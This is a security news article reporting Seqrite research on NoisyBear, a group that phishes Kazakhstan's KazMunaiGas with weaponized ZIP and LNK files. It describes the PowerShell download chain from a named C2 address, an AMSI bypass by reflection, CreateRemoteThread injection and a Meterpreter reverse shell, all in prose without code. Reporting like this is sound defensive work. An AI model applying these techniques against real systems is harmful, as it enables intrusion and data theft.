A sophisticated threat actor known as NoisyBear has emerged as a significant concern for Kazakhstan’s energy sector, employing advanced tactics to infiltrate critical infrastructure through weaponized ZIP files and PowerShell-based attack chains.
This newly identified group has been orchestrating targeted campaigns against KazMunaiGas (KMG), the country’s national oil and gas company, using highly crafted phishing emails that mimic legitimate internal communications about salary schedules and policy updates.
The attack methodology demonstrates remarkable precision in social engineering, with threat actors compromising legitimate business email accounts within KazMunaiGas to lend authenticity to their malicious communications.
These emails contain ZIP attachments disguised as urgent HR-related documents, creating a false sense of legitimacy that encourages employee interaction.
The campaign’s sophistication extends beyond simple phishing, incorporating multi-stage payload delivery systems that leverage trusted system binaries and PowerShell execution environments to maintain stealth throughout the infection process.
Seqrite researchers identified this threat group’s activities beginning in April 2025, with active campaigns intensifying throughout May 2025.
The researchers noted that NoisyBear’s operational patterns suggest Russian origins, evidenced by Russian language comments within malicious code, utilization of sanctioned hosting services, and targeting patterns consistent with geopolitical interests in Central Asian energy resources.
.webp "NoisyBear Weaponizing ZIP Files to PowerShell Loaders and Exfiltrate Sensitive Data 3")
The group’s infrastructure analysis reveals connections to Aeza Group LLC, a sanctioned hosting provider, indicating deliberate attempts to operate within jurisdictions that complicate attribution and takedown efforts.
The malware’s impact extends beyond simple data theft, incorporating advanced persistence mechanisms and defense evasion techniques that allow prolonged network access.
Victims face potential exposure of sensitive corporate communications, strategic planning documents, and operational data critical to Kazakhstan’s energy infrastructure.
The campaign’s focus on energy sector entities raises concerns about potential disruption to critical national infrastructure and economic stability.
Infection Mechanism and Technical Analysis
The NoisyBear infection chain begins with malicious ZIP files containing three critical components: a decoy document bearing the official KazMunaiGas logo, a README.txt file providing execution instructions, and a weaponized LNK file named “График зарплат.lnk” (Salary Schedule.lnk).
The malicious shortcut file employs PowerShell as a Living Off The Land Binary (LOLBIN) to execute sophisticated download operations.
Upon execution, the LNK file initiates a PowerShell command that retrieves a malicious batch script named “123.bat” from the remote server “77.239.125.41:8443”.
The downloaded script is strategically placed in the C:UsersPublic directory, a location chosen for its accessibility and reduced security scrutiny.
The batch script serves as a secondary loader, downloading PowerShell scripts dubbed “DOWNSHELL” by researchers.
These loaders demonstrate advanced Anti-Malware Scan Interface (AMSI) bypass techniques, using reflection to manipulate the System.Management.Automation.AmsiUtils class.
The malware sets the “amsiInitiFailed” flag to convince PowerShell that AMSI initialization has failed, effectively disabling real-time scanning capabilities for subsequent malicious operations.
The final payload involves process injection techniques targeting explorer.exe, utilizing classic CreateRemoteThread injection methods.
The malware employs OpenProcess, VirtualAllocEx, WriteProcessMemory, and CreateRemoteThread API calls to inject Meterpreter reverse shell capabilities, establishing persistent backdoor access for data exfiltration and remote command execution.
Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.
Source link
